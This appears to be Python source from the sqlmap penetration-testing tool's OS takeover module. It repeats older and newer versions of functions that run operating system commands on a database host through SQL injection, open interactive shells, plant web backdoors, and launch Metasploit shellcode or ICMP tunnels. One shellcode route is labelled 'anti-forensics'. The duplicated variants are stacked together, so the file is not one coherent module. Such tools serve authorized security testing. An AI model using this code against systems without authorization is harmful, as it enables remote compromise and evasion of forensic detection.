def osCmd(self):
    """
    Run the single OS command held in ``conf.osCmd`` on the DBMS host.

    Channel selection: if stacked queries are available (or a direct DBMS
    connection, ``conf.direct``, is in use) the command goes through the
    DBMS itself; otherwise a MySQL back end falls back to a web backdoor.
    Any other combination raises ``sqlmapNotVulnerableException``.

    On the web channel the command is only run when
    ``self.webBackdoorUrl`` is set after ``initEnv`` (presumably initEnv
    establishes it).  The staged environment is removed afterwards unless
    ``conf.osShell``, ``conf.osPwn`` or ``conf.cleanup`` is set.
    """
    stackedAvailable = isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED)

    if stackedAvailable or conf.direct:
        useWeb = False
    elif not stackedAvailable and Backend.isDbms(DBMS.MYSQL):
        logger.info("going to use a web backdoor for command execution")
        useWeb = True
    else:
        raise sqlmapNotVulnerableException(
            "unable to execute operating system commands via "
            "the back-end DBMS"
        )

    self.initEnv(web=useWeb)

    # The backdoor URL is only meaningful on the web channel; on the
    # stacked/direct channel the command is always issued.
    if not useWeb or self.webBackdoorUrl is not None:
        self.runCmd(conf.osCmd)

    if not (conf.osShell or conf.osPwn or conf.cleanup):
        self.cleanup()
def osShell(self):
    """
    Open an interactive OS shell prompt on the DBMS host.

    Uses the same channel choice as ``osCmd``: stacked queries or a direct
    DBMS connection run through the DBMS; failing that, a MySQL back end
    uses a web backdoor; anything else raises
    ``sqlmapNotVulnerableException``.  ``self.shell()`` is entered only
    when the channel is usable (on the web channel that means
    ``self.webBackdoorUrl`` is set after ``initEnv``).  Cleanup of the
    staged environment is skipped when ``conf.osPwn`` or
    ``conf.cleanup`` is set.
    """
    stackedAvailable = isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED)

    if stackedAvailable or conf.direct:
        useWeb = False
    elif not stackedAvailable and Backend.isDbms(DBMS.MYSQL):
        logger.info("going to use a web backdoor for command prompt")
        useWeb = True
    else:
        raise sqlmapNotVulnerableException(
            "unable to prompt for an interactive operating "
            "system shell via the back-end DBMS because "
            "stacked queries SQL injection is not supported"
        )

    self.initEnv(web=useWeb)

    if not useWeb or self.webBackdoorUrl is not None:
        self.shell()

    if not (conf.osPwn or conf.cleanup):
        self.cleanup()
def osShell(self):
    """
    Open an interactive OS shell prompt on the DBMS host (older variant).

    First runs ``stackedTest()`` so that ``kb.stackedTest`` is populated,
    then picks the channel: stacked queries or a direct connection
    (``conf.direct``) go through the DBMS; otherwise a MySQL back end
    (``kb.dbms == DBMS.MYSQL``) uses a web backdoor; anything else raises
    ``sqlmapNotVulnerableException``.  ``self.shell()`` runs only when the
    chosen channel is usable.  Cleanup is skipped when ``conf.osPwn`` or
    ``conf.cleanup`` is set.
    """
    stackedTest()

    if kb.stackedTest or conf.direct:
        useWeb = False
    elif not kb.stackedTest and kb.dbms == DBMS.MYSQL:
        logger.info("going to use a web backdoor for command prompt")
        useWeb = True
    else:
        raise sqlmapNotVulnerableException(
            "unable to prompt for an interactive operating "
            "system shell via the back-end DBMS"
        )

    self.initEnv(web=useWeb)

    if not useWeb or self.webBackdoorUrl is not None:
        self.shell()

    if not (conf.osPwn or conf.cleanup):
        self.cleanup()
def osCmd(self):
    """
    Run the single OS command held in ``conf.osCmd`` (older variant).

    Runs ``stackedTest()`` to populate ``kb.stackedTest``, then chooses
    the channel exactly as ``osShell`` does: stacked queries or a direct
    connection through the DBMS, else a MySQL web backdoor, else
    ``sqlmapNotVulnerableException``.  The command is issued only when the
    channel is usable.  Cleanup is skipped when ``conf.osShell``,
    ``conf.osPwn`` or ``conf.cleanup`` is set.
    """
    stackedTest()

    if kb.stackedTest or conf.direct:
        useWeb = False
    elif not kb.stackedTest and kb.dbms == DBMS.MYSQL:
        logger.info("going to use a web backdoor for command execution")
        useWeb = True
    else:
        raise sqlmapNotVulnerableException(
            "unable to execute operating system commands via "
            "the back-end DBMS"
        )

    self.initEnv(web=useWeb)

    if not useWeb or self.webBackdoorUrl is not None:
        self.runCmd(conf.osCmd)

    if not (conf.osShell or conf.osPwn or conf.cleanup):
        self.cleanup()
class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
    """
    This class defines generic OS takeover functionalities for plugins.

    The three entry points (osCmd, osShell, osPwn) share one channel
    choice: stacked queries or a direct DBMS connection (conf.direct)
    work through the DBMS itself; otherwise a MySQL back end falls back
    to a web backdoor; anything else raises sqlmapNotVulnerableException.
    Each entry point tears the staged environment down via cleanup()
    unless a later stage (or conf.cleanup) is also requested.
    """

    def __init__(self):
        # Table and column names used for command output; their actual use
        # lives in the mixins and is not visible here.
        self.cmdTblName = "sqlmapoutput"
        self.tblField = "data"

        Abstraction.__init__(self)

    def osCmd(self):
        """
        Run the single OS command held in conf.osCmd on the DBMS host.

        Raises sqlmapNotVulnerableException when neither stacked queries,
        a direct connection nor a MySQL web backdoor is available.
        """
        if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct:
            web = False
        elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.isDbms(DBMS.MYSQL):
            infoMsg = "going to use a web backdoor for command execution"
            logger.info(infoMsg)
            web = True
        else:
            errMsg = "unable to execute operating system commands via "
            errMsg += "the back-end DBMS"
            raise sqlmapNotVulnerableException(errMsg)

        self.initEnv(web=web)

        # On the web channel the command only runs once a backdoor URL is
        # known (presumably set by initEnv — confirm).
        if not web or (web and self.webBackdoorUrl is not None):
            self.runCmd(conf.osCmd)

        # Later stages (osShell/osPwn) reuse the environment, so skip
        # cleanup when they are requested or when conf.cleanup is set.
        if not conf.osShell and not conf.osPwn and not conf.cleanup:
            self.cleanup()

    def osShell(self):
        """
        Open an interactive OS shell prompt on the DBMS host.

        Same channel selection as osCmd; raises
        sqlmapNotVulnerableException when no channel is usable.
        """
        if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct:
            web = False
        elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.isDbms(DBMS.MYSQL):
            infoMsg = "going to use a web backdoor for command prompt"
            logger.info(infoMsg)
            web = True
        else:
            errMsg = "unable to prompt for an interactive operating "
            errMsg += "system shell via the back-end DBMS because "
            errMsg += "stacked queries SQL injection is not supported"
            raise sqlmapNotVulnerableException(errMsg)

        self.initEnv(web=web)

        if not web or (web and self.webBackdoorUrl is not None):
            self.shell()

        if not conf.osPwn and not conf.cleanup:
            self.cleanup()

    def osPwn(self):
        """
        Establish an out-of-band session with the DBMS host.

        Flow as implemented below:
          1. On a Windows back end the operator picks the tunnel type
             (1 = TCP via Metasploit, 2 = ICMP via icmpsh); on any other
             OS the TCP tunnel is forced.
          2. The ICMP tunnel requires running sqlmap as administrator and
             the 'impacket' library, and flips the *local* machine's
             icmp_echo_ignore_all sysctl when that /proc file exists.
          3. The staging channel is chosen as in osCmd/osShell (stacked
             or direct, else MySQL web backdoor, else
             sqlmapNotVulnerableException).
          4. For the TCP tunnel the Metasploit shellcode is created and,
             unless the in-memory UDF route was chosen, uploaded via
             shellcodeexec; self.pwn() then drives the session.  The ICMP
             route finishes inside icmpPwn().
        """
        goUdf = False

        self.checkDbmsOs()

        if Backend.isOs(OS.WINDOWS):
            msg = "how do you want to establish the tunnel?"
            msg += "\n[1] TCP: Metasploit Framework (default)"
            msg += "\n[2] ICMP: icmpsh - ICMP tunneling"
            valids = ( 1, 2 )

            # readInput may hand back either a string or an int; both forms
            # are accepted, anything else re-prompts.
            while True:
                tunnel = readInput(msg, default=1)

                if isinstance(tunnel, basestring) and tunnel.isdigit() and int(tunnel) in valids:
                    tunnel = int(tunnel)
                    break
                elif isinstance(tunnel, int) and tunnel in valids:
                    break
                else:
                    warnMsg = "invalid value, valid values are 1 and 2"
                    logger.warn(warnMsg)
        else:
            tunnel = 1

            debugMsg = "the tunnel can be established only via TCP when "
            debugMsg += "the back-end DBMS is not Windows"
            logger.debug(debugMsg)

        if tunnel == 2:
            # icmpsh needs raw sockets on the local side, hence the
            # administrator check.
            isAdmin = runningAsAdmin()

            if not isAdmin:
                errMsg = "you need to run sqlmap as an administrator "
                errMsg += "if you want to establish an out-of-band ICMP "
                errMsg += "tunnel because icmpsh uses raw sockets to "
                errMsg += "sniff and craft ICMP packets"
                # Python 2 raise syntax, kept as-is.
                raise sqlmapMissingPrivileges, errMsg

            # Presence check only: ImpactDecoder/ImpactPacket are not used
            # in this method.
            try:
                from impacket import ImpactDecoder
                from impacket import ImpactPacket
            except ImportError, _:
                errMsg = "sqlmap requires 'impacket' third-party library "
                errMsg += "in order to run icmpsh master. Download from "
                errMsg += "http://oss.coresecurity.com/projects/impacket.html"
                raise sqlmapMissingDependence, errMsg

            sysIgnoreIcmp = "/proc/sys/net/ipv4/icmp_echo_ignore_all"

            # Changes a system-wide kernel setting on the local machine.
            # NOTE(review): nothing in this method restores the previous
            # value and the file is written without try/finally — confirm
            # whether cleanup() reverts it.
            if os.path.exists(sysIgnoreIcmp):
                fp = open(sysIgnoreIcmp, "wb")
                fp.write("1")
                fp.close()
            else:
                # Only logged; execution continues without the setting.
                errMsg = "you need to disable ICMP replies by your machine "
                errMsg += "system-wide. For example run on Linux/Unix:\n"
                errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\n"
                errMsg += "If you miss doing that, you will receive "
                errMsg += "information from the database server and it "
                errMsg += "is unlikely to receive commands sent from you"
                logger.error(errMsg)

            # pop() without a default raises KeyError if the entry is
            # missing — presumably always present at this point; verify.
            if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
                self.sysUdfs.pop("sys_bineval")

        if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct:
            web = False

            self.getRemoteTempPath()
            self.initEnv(web=web)

            if tunnel == 1:
                # Only MySQL/PostgreSQL offer the in-memory UDF route.
                if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
                    msg = "how do you want to execute the Metasploit shellcode "
                    msg += "on the back-end database underlying operating system?"
                    msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
                    msg += "\n[2] Via shellcodeexec (file system way, preferred on 64-bit systems)"

                    while True:
                        choice = readInput(msg, default=1)

                        if isinstance(choice, basestring) and choice.isdigit() and int(choice) in ( 1, 2 ):
                            choice = int(choice)
                            break
                        elif isinstance(choice, int) and choice in ( 1, 2 ):
                            break
                        else:
                            warnMsg = "invalid value, valid values are 1 and 2"
                            logger.warn(warnMsg)

                    if choice == 1:
                        goUdf = True

                # Exit function of the shellcode: "thread" for the UDF
                # route, "process" otherwise.
                if goUdf:
                    exitfunc="thread"
                else:
                    exitfunc="process"

                self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")

                if not goUdf:
                    self.uploadShellcodeexec()

                if Backend.isOs(OS.WINDOWS) and conf.privEsc:
                    if Backend.isDbms(DBMS.MYSQL):
                        debugMsg = "by default MySQL on Windows runs as SYSTEM "
                        debugMsg += "user, no need to privilege escalate"
                        logger.debug(debugMsg)

            elif tunnel == 2:
                self.uploadIcmpshSlave(web=web)
                self.icmpPwn()

        elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.isDbms(DBMS.MYSQL):
            web = True

            infoMsg = "going to use a web backdoor to establish the tunnel"
            logger.info(infoMsg)

            self.initEnv(web=web)

            if self.webBackdoorUrl:
                if not Backend.isOs(OS.WINDOWS) and conf.privEsc:
                    # Unset --priv-esc if the back-end DBMS underlying
                    # operating system is not Windows
                    conf.privEsc = False

                    warnMsg = "sqlmap does not implement any operating system "
                    warnMsg += "user privilege escalation technique when the "
                    warnMsg += "back-end DBMS underlying system is not Windows"
                    logger.warn(warnMsg)

                self.getRemoteTempPath()

                # No UDF route on the web channel: always the file-system way.
                if tunnel == 1:
                    self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
                    self.uploadShellcodeexec(web=web)
                elif tunnel == 2:
                    self.uploadIcmpshSlave(web=web)
                    self.icmpPwn()
        else:
            errMsg = "unable to prompt for an out-of-band session because "
            errMsg += "stacked queries SQL injection is not supported"
            raise sqlmapNotVulnerableException(errMsg)

        # Only the TCP tunnel goes through pwn(); the ICMP route already
        # ran icmpPwn() above.
        if tunnel == 1:
            if not web or (web and self.webBackdoorUrl is not None):
                self.pwn(goUdf)

        if not conf.cleanup:
            self.cleanup()
def osPwn(self):
    """
    Establish an out-of-band Metasploit session with the DBMS host
    (older variant driven by kb.stackedTest / kb.dbms strings).

    Channel selection: stacked queries go through the DBMS, with a choice
    between the in-memory 'sys_bineval' UDF route and a stand-alone
    payload stager on MySQL/PostgreSQL; otherwise a MySQL back end uses a
    web backdoor and always the payload stager; anything else raises
    sqlmapNotVulnerableException.  self.pwn() then drives the session
    and cleanup() runs unless conf.cleanup is set.
    """
    goUdf = False

    stackedTest()

    if kb.stackedTest:
        web = False

        self.initEnv(web=web)
        self.getRemoteTempPath()

        # Only MySQL/PostgreSQL offer the in-memory UDF route.
        if kb.dbms in ( "MySQL", "PostgreSQL" ):
            msg = "how do you want to execute the Metasploit shellcode "
            msg += "on the back-end database underlying operating system?"
            msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
            msg += "\n[2] Stand-alone payload stager (file system way)"

            # readInput may hand back either a str or an int; both forms
            # are accepted, anything else re-prompts.
            while True:
                choice = readInput(msg, default=1)

                if isinstance(choice, str) and choice.isdigit() and int(choice) in ( 1, 2 ):
                    choice = int(choice)
                    break
                elif isinstance(choice, int) and choice in ( 1, 2 ):
                    break
                else:
                    warnMsg = "invalid value, valid values are 1 and 2"
                    logger.warn(warnMsg)

            if choice == 1:
                goUdf = True

        if goUdf:
            self.createMsfShellcode(exitfunc="thread", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
        else:
            self.createMsfPayloadStager()
            self.uploadMsfPayloadStager()

        if kb.os == "Windows" and conf.privEsc:
            if kb.dbms == "MySQL":
                debugMsg = "by default MySQL on Windows runs as SYSTEM "
                debugMsg += "user, no need to privilege escalate"
                logger.debug(debugMsg)
        elif kb.os != "Windows" and conf.privEsc:
            # Unset --priv-esc if the back-end DBMS underlying operating
            # system is not Windows
            conf.privEsc = False

            warnMsg = "sqlmap does not implement any operating system "
            warnMsg += "user privilege escalation technique when the "
            warnMsg += "back-end DBMS underlying system is not Windows"
            logger.warn(warnMsg)

    elif not kb.stackedTest and kb.dbms == "MySQL":
        infoMsg = "going to use a web backdoor to execute the "
        infoMsg += "payload stager"
        logger.info(infoMsg)

        web = True

        self.initEnv(web=web)

        # Everything below depends on initEnv having produced a backdoor
        # URL; without one the method falls through to the final checks.
        if self.webBackdoorUrl:
            if kb.os != "Windows" and conf.privEsc:
                # Unset --priv-esc if the back-end DBMS underlying operating
                # system is not Windows
                conf.privEsc = False

                warnMsg = "sqlmap does not implement any operating system "
                warnMsg += "user privilege escalation technique when the "
                warnMsg += "back-end DBMS underlying system is not Windows"
                logger.warn(warnMsg)

            self.getRemoteTempPath()
            self.createMsfPayloadStager()
            self.uploadMsfPayloadStager(web=True)

    else:
        errMsg = "unable to prompt for an out-of-band session via "
        errMsg += "the back-end DBMS"
        raise sqlmapNotVulnerableException(errMsg)

    # pwn() is skipped on the web channel when no backdoor URL exists.
    if not web or (web and self.webBackdoorUrl is not None):
        self.pwn(goUdf)

    if not conf.cleanup:
        self.cleanup()